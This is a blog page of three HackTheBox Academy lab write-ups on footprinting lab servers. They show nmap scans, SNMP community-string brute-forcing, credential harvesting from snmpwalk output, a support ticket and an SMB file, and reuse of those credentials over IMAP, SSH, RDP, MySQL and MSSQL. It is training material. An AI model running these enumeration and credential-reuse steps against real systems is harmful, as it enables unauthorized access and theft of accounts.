Category: Penetration Test

What follows is a writeup of the lab Footprinting Hard from the HackTheBox Academy.

Given scenario.

The third server is an MX and management server for the internal network. Subsequently, this server has the function of a backup server for the internal accounts in the domain. Accordingly, a user named HTB was also created here, whose credentials we need to access.

Reconnaissance

First of all, let’s begin with a Syn Scan followed by a Service Scan.

$ sudo nmap 10.129.75.152 -p$(cat ./ports_list) -sV -oA nmap_service-version -vv
...

PORT    STATE SERVICE  REASON         VERSION
22/tcp  open  ssh      syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
110/tcp open  pop3     syn-ack ttl 63 Dovecot pop3d
143/tcp open  imap     syn-ack ttl 63 Dovecot imapd (Ubuntu)
993/tcp open  ssl/imap syn-ack ttl 63 Dovecot imapd (Ubuntu)
995/tcp open  ssl/pop3 syn-ack ttl 63 Dovecot pop3d
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

What we find are SSH, POP3, and IMAP services running.

POP3 enumeration

Enumerating the Post Office Protocol (POP) we find that it supports AUTH-RESP-CODE which, as stated in the protocol RFC 3206, may allow attackers to enumerate users.

The AUTH Response Code

The AUTH response code informs the client that there is a problem
with the user’s credentials. This might be an incorrect password, an
unknown user name, an expired account, an attempt to authenticate in
violation of policy (such as from an invalid location or during an
unauthorized time), or some other problem.

The AUTH response code is valid with an -ERR response to any
authentication command including AUTH, USER (see note), PASS, or
APOP.

Servers which include the AUTH response code with any authentication
failure SHOULD support the CAPA command [POP3-EXT] and SHOULD include
the AUTH-RESP-CODE capability in the CAPA response. AUTH-RESP-CODE
assures the client that only errors with the AUTH code are caused by
credential problems.
  NOTE:  Returning the AUTH response code to the USER command
  reveals to the client that the specified user exists.  It is
  strongly RECOMMENDED that the server not issue this response code
  to the USER command.

$ curl -k 'pop3://10.129.75.152' -v
*   Trying 10.129.75.152:110...
* Connected to 10.129.75.152 (10.129.75.152) port 110
< +OK Dovecot (Ubuntu) ready.
> CAPA
< +OK
< CAPA
< TOP
< UIDL
< RESP-CODES
< PIPELINING
< AUTH-RESP-CODE
< STLS
< USER
< SASL PLAIN
< .
> LIST
< -ERR Unknown command.
* shutting down connection #0
> QUIT
< +OK Logging out
curl: (8) Weird server reply

Unfortunately the server always sends the same response defeating any kind of user enumeration.

Back to Reconnaissance

We repeat the scanning of the target machine looking for open UDP ports instead of TCP, finding that port 161 is open.

$ nmap 10.129.202.20 -sU --top-ports=1000

Nmap scan report for 10.129.202.20
Host is up (0.070s latency).
Not shown: 998 closed udp ports (port-unreach)
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
161/udp open          snmp

SNMP Enumeration

According to nmap the snmp service is version 3, meaning that we need valid usernames and passwords in order to authenticate.

$ nmap -sU -Pn -sV -p161 10.129.31.148 -oN nmap_service-version-udp.nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-01 22:35 CEST
Nmap scan report for 10.129.31.148
Host is up (0.042s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    net-snmp; net-snmp SNMPv3 server

We try to perform a brute-force of the community string using nmap and onesixtyone.
Both tools run successfully and return the same community string: backup.

$ sudo nmap -sU -p161 -Pn -vv --script snmp-brute --script-args snmp-brute.communitiesdb=/usr/share/seclists/Discovery/SNMP/snmp.txt 10.129.31.148
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-01 22:57 CEST
[...]
PORT    STATE SERVICE REASON
161/udp open  snmp    udp-response ttl 63
| snmp-brute:
|_  backup - Valid credentials

$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt -o snmp-1.log 10.129.31.148
Logging to file snmp-1.log
Scanning 1 hosts, 3219 communities
10.129.31.148 [backup] Linux NIXHARD 5.4.0-90-generic

Now that we have a community string we can try our luck and retrieve the MIB using snmpwalk specifying a different snmp version.

Luckily for us it works!
Among the OIDs we find entries about a script for a password reset and a username and password pair.

$ snmpwalk -v2c -c backup 10.129.31.148 | tee -a snmpwalk_output_mib

iso.3.6.1.2.1.1.1.0 = STRING: "Linux NIXHARD 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64"                                                   iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (288452) 0:48:04.52
iso.3.6.1.2.1.1.4.0 = STRING: "Admin <tech@inlanefreight.htb>"
iso.3.6.1.2.1.1.5.0 = STRING: "NIXHARD"                                            iso.3.6.1.2.1.1.6.0 = STRING: "Inlanefreight"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (37) 0:00:00.37
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1                                     iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49                                    iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92                                   [0/225]iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."                                                   iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (37) 0:00:00.37
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (37) 0:00:00.37
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (37) 0:00:00.37
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (37) 0:00:00.37
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (37) 0:00:00.37
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (37) 0:00:00.37
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (37) 0:00:00.37
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (37) 0:00:00.37
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (37) 0:00:00.37
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (37) 0:00:00.37
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (289324) 0:48:13.24
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E9 04 01 15 09 33 00 2B 00 00
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.4.0-90-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro ipv6.disable=1 maybe-ubiquity"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 160
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
iso.3.6.1.2.1.25.1.7.1.1.0 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.2.6.66.65.67.75.85.80 = STRING: "/opt/tom-recovery.sh"
iso.3.6.1.2.1.25.1.7.1.2.1.3.6.66.65.67.75.85.80 = STRING: "tom <password>"
iso.3.6.1.2.1.25.1.7.1.2.1.4.6.66.65.67.75.85.80 = ""
iso.3.6.1.2.1.25.1.7.1.2.1.5.6.66.65.67.75.85.80 = INTEGER: 5
iso.3.6.1.2.1.25.1.7.1.2.1.6.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.7.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.20.6.66.65.67.75.85.80 = INTEGER: 4
iso.3.6.1.2.1.25.1.7.1.2.1.21.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.3.1.1.6.66.65.67.75.85.80 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:"
iso.3.6.1.2.1.25.1.7.1.3.1.2.6.66.65.67.75.85.80 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:
Authentication token manipulation error
chpasswd: (line 1, user tom) password not changed
Changing password for tom."
iso.3.6.1.2.1.25.1.7.1.3.1.3.6.66.65.67.75.85.80 = INTEGER: 4
iso.3.6.1.2.1.25.1.7.1.3.1.4.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.1 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.2 = STRING: "Authentication token manipulation error"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.3 = STRING: "chpasswd: (line 1, user tom) password not changed"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.4 = STRING: "Changing password for tom."
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.4 = No more variables left in this MIB View (It is past the end of the MIB tree)

IMAP

We access the IMAP server using the user tom and enumerate the content of its mailbox.

There is only one message, in the INBOX folder, which contains a OpenSSH private key.

$ openssl s_client -connect 10.129.31.148:imaps

* OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] Dovecot (Ubuntu) ready.                                                                                                  00 LOGIN tom <password>
00 OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SNIPPET=FUZZY PREVIEW=FUZZY LITERAL+ NOTIFY SPECIAL-USE] Logged in                              00 LIST "" *
* LIST (\HasNoChildren) "." Notes
* LIST (\HasNoChildren) "." Meetings
* LIST (\HasNoChildren \UnMarked) "." Important
* LIST (\HasNoChildren) "." INBOX
00 OK List completed (0.007 + 0.000 + 0.006 secs).
00 SELECT INBOX
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 1 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1636509064] UIDs valid
* OK [UIDNEXT 2] Predicted next UID
00 OK [READ-WRITE] Select completed (0.005 + 0.000 + 0.004 secs).
00 FETCH 1 all
* 1 FETCH (FLAGS (\Seen) INTERNALDATE "10-Nov-2021 01:44:26 +0000" RFC822.SIZE 3661 ENVELOPE ("Wed, 10 Nov 2010 14:21:26 +0200" "KEY" ((NIL NIL "MISSING_MAILBOX" "MISSING_DOMAIN")) ((NIL NIL "MISSING_MAILBOX" "MISSING_DOMAIN")) ((NIL NIL "MISSING_MAILBOX" "MISSING_DOMAIN")) ((NIL NIL "tom" "inlanefreight.htb")) NIL NIL 
00 FETCH 1 BODY[TEXT]
* 1 FETCH (BODY[TEXT] {3430}
* -----BEGIN OPENSSH PRIVATE KEY-----
<key>
-----END OPENSSH PRIVATE KEY-----
)
00 OK Fetch completed (0.001 + 0.000 secs).

SSH and MySQL

Using the user tom username, password and private key we access the target machine over SSH.

Listing the content of tom’s home directory we find the file .mysql_history which includes clues about a local running MySQL instance.
Using mysql we connect to the MySQL instance, access the database users, inspect its schema and retrive the password of the user HTB.

tom@NIXHARD:~$ cat .mysql_history
_HiStOrY_V2_
show\040databases;
select\040*\040from\040users;
use\040users;
select\040*\040from\040users;
show\040databases;
use\040users;
select\040*\040from\040users;

$ mysql 127.0.0.1 -u tom -p

Your MySQL connection id is 8
Server version: 8.0.27-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2021, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| users              |
+--------------------+
5 rows in set (0.01 sec)

mysql> USE users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> SHOW TABLES;
+-----------------+
| Tables_in_users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.00 sec)

mysql> SHOW COLUMNS FROM users;
+----------+-------------+------+-----+---------+-------+
| Field    | Type        | Null | Key | Default | Extra |
+----------+-------------+------+-----+---------+-------+
| id       | int         | YES  |     | NULL    |       |
| username | varchar(50) | YES  |     | NULL    |       |
| password | varchar(50) | YES  |     | NULL    |       |
+----------+-------------+------+-----+---------+-------+
3 rows in set (0.00 sec)

mysql> SELECT password FROM users WHERE username="HTB";
+------------------------------+
| password                     |
+------------------------------+
| <password> |
+------------------------------+
1 row in set (0.00 sec)

mysql>

HTB: Footprinting – Hard

–––––––

Apr 3

What follows is a writeup of the lab Footprinting Medium from the HackTheBox Academy.

Given scenario.

This second server is a server that everyone on the internal network has access to. In our discussion with our client, we pointed out that these servers are often one of the main targets for attackers and that this server should be added to the scope.

Our customer agreed to this and added this server to our scope. Here, too, the goal remains the same. We need to find out as much information as possible about this server and find ways to use it against the server itself. For the proof and protection of customer data, a user named HTB has been created. Accordingly, we need to obtain the credentials of this user as proof.

Reconnaissance

We start the lab enumerating the services exposed running a nmap Syn Scan against all 65535 ports of the target machine.

$ nmap -sS 10.129.57.225 -n -p- -oN nmap_allports_synscan --open | grep open | cut -d "/" -f1 | tr "\n" "," | tee -a ports_list

Nmap scan report for 10.129.202.41
Host is up (0.037s latency).
Not shown: 61475 closed tcp ports (reset), 4044 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
111/tcp   open  rpcbind
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49679/tcp open  unknown
49680/tcp open  unknown
49681/tcp open  unknown

From what we see, the target machine exposes Windows services such as RDP, SMB and WinRM.
These are all juicy services to enumerate further to find a way in but there is another service we are going to enumerate first: NFS.

NFS Enumeration

Network File System allows users to mount and use remote shares as if they were local to the computer.
While in its latest version (version 4) authentication is user-based, in versions 1, 2 and 3 authentication is device-based meaning that all users of an authenticated device can access the remote shares.

As we can see our target machine exposes NFS version 2, 3 and 4 and there is a remote share accessible: TechSupport.

$ sudo nmap 10.129.202.41 -p111,2049 -sV -sC -oA nmap_nfsenum
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-28 12:08 CET
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan                                                                                                                 Service scan Timing: About 50.00% done; ETC: 12:09 (0:00:22 remaining)
Nmap scan report for 10.129.202.41
Host is up (0.030s latency).

PORT     STATE SERVICE  VERSION
111/tcp  open  rpcbind?
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status                                          |   100024  1           2049/tcp6  status                                          |   100024  1           2049/udp   status                                          |_  100024  1           2049/udp6  status                                          2049/tcp open  mountd  1-3 (RPC #100005)
| nfs-showmount:
|_  /TechSupport

We mount the remote share specifying the version to use and then we list its content.
The folder contains a lot of text files of support tickets, all empty except for one: ticket4238791283782.txt.

$ sudo mount -t nfs 10.129.202.41:/TechSupport ./targetnfs/ -o nolock,nfsvers=3

sudo ls -la  targetnfs/
total 70
drwx------ 2     4294967294     4294967294 65536 Mar 29 16:22 .
drwxr-xr-x 3 htb-ac-1736803 htb-ac-1736803  4096 Mar 29 16:37 ..
-rwx------ 1     4294967294     4294967294     0 Nov 10  2021 ticket4238791283649.txt
[..]
-rwx------ 1     4294967294     4294967294  1305 Nov 10  2021 ticket4238791283782.txt
-rwx------ 1     4294967294     4294967294     0 Nov 10  2021 ticket4238791283783.txt
[..]

The file contains a support request from the user alex about an issue with SMTP.
Luckily for us, username and password are there.
We take note and proceed to reuse the credentials against other services.

$ sudo cat targetnfs/ticket4238791283782.txt
Conversation with InlaneFreight Ltd

Started on November 10, 2021 at 01:27 PM London time GMT (GMT+0200)
---
01:27 PM | Operator: Hello,. 
 
So what brings you here today?
01:27 PM | alex: hello
01:27 PM | Operator: Hey alex!
01:27 PM | Operator: What do you need help with?
01:36 PM | alex: I run into an issue with the web config file on the system for the smtp server. do you mind to take a look at the config?
01:38 PM | Operator: Of course
01:42 PM | alex: here it is:

 1smtp {
 2    host=smtp.web.dev.inlanefreight.htb
 3    #port=25
 4    ssl=true
 5    user="alex"
 6    password="<password>"
 7    from="alex.g@web.dev.inlanefreight.htb"
 8}
 9
10securesocial {
11    
12    onLoginGoTo=/
13    onLogoutGoTo=/login
14    ssl=false
15    
16    userpass {      
17      withUserNameSupport=false
18      sendWelcomeEmail=true
19      enableGravatarSupport=true
20      signupSkipLogin=true
21      tokenDuration=60
22      tokenDeleteInterval=5
23      minimumPasswordLength=8
24      enableTokenJob=true
25      hasher=bcrypt
26      }
27
28     cookie {
29     #       name=id
30     #       path=/login
31     #       domain="10.129.2.59:9500"
32            httpOnly=true
33            makeTransient=false
34            absoluteTimeoutInMinutes=1440
35            idleTimeoutInMinutes=1440
36    }

SMB Enumeration

Much like NFS, Server Message Block (SMB) is an implementation of a Network File System for Windows computers.

We try listing remote directories using alex username and password via smbclient and, with little surprise, we have a list of available shares.

$ smbclient -U alex -L //10.129.202.41/
Password for [WORKGROUP\alex]:

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin                                             
C$              Disk      Default share
devshare        Disk                                                               
IPC$            IPC       Remote IPC
Users           Disk

Connecting to the share devshare and listing its content we find a text file, important.txt, whic contains a username and a password.

$ smbclient -U alex //10.129.202.41/devshare
Password for [WORKGROUP\alex]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Nov 10 17:12:22 2021
  ..                                  D        0  Wed Nov 10 17:12:22 2021
  important.txt                       A       16  Wed Nov 10 17:12:55 2021

10328063 blocks of size 4096. 6101323 blocks available
smb: \> get important.txt
getting file \important.txt of size 16 as important.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \>

The username sa is the default username for MSSQL letting us guess that there may be a MSSQL istance running locally on the machine.

$ cat important.txt
sa:<password>

The share Users does not contain any more relevant information or files than what we already found using NFS.

RDP

Since we already know that Alex’s username and password are valid, it’s time to connect to the target machine using the Remote Desktop Protocol (RDP).

$ xfreerdp /cert:ignore /u:alex /p:'<password>' /v:10.129.202.41

Before heading for MSSQL we take a little time to scroll through the Windows Event Viewer in search of useful information.
The exploration brings us some results: the names of the databases from event IDs 17137 descriptions among which the most interesting is accounts.

It’s time now to open SQL Management Server Studio (SMSS) and retrieve the password for the user HTB but to our surprise… the password of the user sa is wrong!
Trying to access using the user alex and the Windows authentication method does not work neither.

What should we do now?
Further enumeration leads us to find that the user alex is a standard user, that the built-in user Administrator is enabled and that its password is the one we found for the user sa.

Let’s open SMSS again, authenticate as Administrator using the Windows authentication method and retrieve the password of the user HTB.

SELECT * FROM accounts WHERE user = "HTB"

HTB: Footprinting – Medium

–––––––

Apr 3

What follows is a writeup of the lab Footprinting Easy from the HackTheBox Academy.

Given scenario.

We were commissioned by the company Inlanefreight Ltd to test three different servers in their internal network. The company uses many different services, and the IT security department felt that a penetration test was necessary to gain insight into their overall security posture.

The first server is an internal DNS server that needs to be investigated. In particular, our client wants to know what information we can get out of these services and how this information could be used against its infrastructure. Our goal is to gather as much information as possible about the server and find ways to use that information against the company. However, our client has made it clear that it is forbidden to attack the services aggressively using exploits, as these services are in production.

Additionally, our teammates have found the following credentials “ceil:qwer1234“, and they pointed out that some of the company’s employees were talking about SSH keys on a forum.

The administrators have stored a flag.txt file on this server to track our progress and measure success. Fully enumerate the target and submit the contents of this file as proof.

Reconnaissance

First of all, let’s begin by probing the target machine with a Syn Scan (2-way handshake).
Limiting the number of ports to scan to the 1000 most commonly used ports is fine for this lab.

$ nmap 10.129.59.20 -Pn -sS --top-ports=1000 -n --disable-arp-ping
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-27 22:31 CET
Nmap scan report for 10.129.59.20
Host is up (0.059s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
53/tcp   open  domain
2121/tcp open  ccproxy-ftp

Now that we have a list of open ports, it’s time to see what versions of these well-known services are running.

Even though nmap cannot output a valid version for FTP on port 21 and 2121, we can see from the appended services fingerprints that there is a ProFTPD server running.

Of particular interest is the second fingerprint which reveals the banner 220\x20ProFTPD\x20Server\x20\(Ceil's\x20FTP\)\x20.
As we can see connecting to FTP on port 2121, it exposes the home directory of the user ceil.

$ nmap 10.129.59.20 -Pn -n -sV -p21,22,53,2121
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-27 22:32 CET
Stats: 0:01:05 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 22:34 (0:00:21 remaining)
Stats: 0:01:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 22:34 (0:00:23 remaining)
Nmap scan report for 10.129.59.20
Host is up (0.055s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp?
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
53/tcp   open  domain  ISC BIND 9.16.1 (Ubuntu Linux)
2121/tcp open  ftp
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port21-TCP:V=7.95%I=7%D=3/27%Time=67E5C415%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,9B,"220\x20ProFTPD\x20Server\x20\(ftp\.int\.inlanefreight\.htb
SF:\)\x20\[10\.129\.59\.20\]\r\n500\x20Invalid\x20command:\x20try\x20being
SF:\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20m
SF:ore\x20creative\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2121-TCP:V=7.95%I=7%D=3/27%Time=67E5C415%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,8C,"220\x20ProFTPD\x20Server\x20\(Ceil's\x20FTP\)\x20\[10\.1
SF:29\.59\.20\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20c
SF:reative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creati
SF:ve\r\n");

FTP Enumeration

Once connected we issue the command ls -la to list the content of the directory, hidden files and folders as well.
Among the hidden files and directories we should inspect .bash_history to retrieve the latest commands used while we must get a copy of the folder .ssh.

$ ftp ceil@10.129.59.20 -P2121
Connected to 10.129.59.20.
220 ProFTPD Server (Ceil's FTP) [10.129.59.20]
331 Password required for ceil
Password:
230 User ceil logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||60164|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   4 ceil     ceil         4096 Nov 10  2021 .
drwxr-xr-x   4 ceil     ceil         4096 Nov 10  2021 ..
-rw-------   1 ceil     ceil          294 Nov 10  2021 .bash_history
-rw-r--r--   1 ceil     ceil          220 Nov 10  2021 .bash_logout
-rw-r--r--   1 ceil     ceil         3771 Nov 10  2021 .bashrc
drwx------   2 ceil     ceil         4096 Nov 10  2021 .cache
-rw-r--r--   1 ceil     ceil          807 Nov 10  2021 .profile
drwx------   2 ceil     ceil         4096 Nov 10  2021 .ssh
-rw-------   1 ceil     ceil          759 Nov 10  2021 .viminfo

.bash_history content:

cat id_rsa.pub >> authorized_keys
cd ..
cd /home
cd ceil/
ls -l
ls -al
mkdir flag
cd flag/
touch flag.txt
vim flag.txt
cat flag.txt
ls -al
mv flag/flag.txt .

Endpoint landing

Having the SSH identity file of the user ceil we can now connect to the target machine and explore directories outside of the home directory.

Before connecting, the permissions on the id_rsa file must be changed to limit read and write permissions to the owner only, being this file a private key.

$ chmod 600 id_rsa

$ ll
total 12
-rw-r--r-- 1 count_0_interrupt count_0_interrupt  738 Nov 10  2021 authorized_keys
-rw------- 1 count_0_interrupt count_0_interrupt 3381 Nov 10  2021 id_rsa
-rw-r--r-- 1 count_0_interrupt count_0_interrupt  738 Nov 10  2021 id_rsa.pub

$ ssh ceil@10.129.59.20 -i id_rsa

Data Exfiltration

Once inside the target machine, the flag is found inside the user flag home directory.

ceil@NIXEASY:~$ ls /home/
ceil  cry0l1t3  flag
ceil@NIXEASY:/home$ cd flag/
ceil@NIXEASY:/home/flag$ ll
total 36
drwxr-xr-x 4 ceil ceil 4096 Nov 10  2021 ./
drwxr-xr-x 5 root root 4096 Nov 10  2021 ../
-rw------- 1 ceil ceil   42 Nov 10  2021 .bash_history
-rw-r--r-- 1 ceil ceil  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Feb 25  2020 .bashrc
drwx------ 2 ceil ceil 4096 Dec 15  2020 .cache/
-rw-rw-r-- 1 ceil ceil   61 Nov 10  2021 flag.txt
drwxrwxr-x 3 ceil ceil 4096 Dec 15  2020 .local/
-rw-r--r-- 1 ceil ceil  807 Feb 25  2020 .profile
-rw-r--r-- 1 ceil ceil    0 Dec 15  2020 .sudo_as_admin_successful
ceil@NIXEASY:/home/flag$ cat flag.txt
HTB{x}

HTB: Footprinting – Easy

–––––––

Apr 2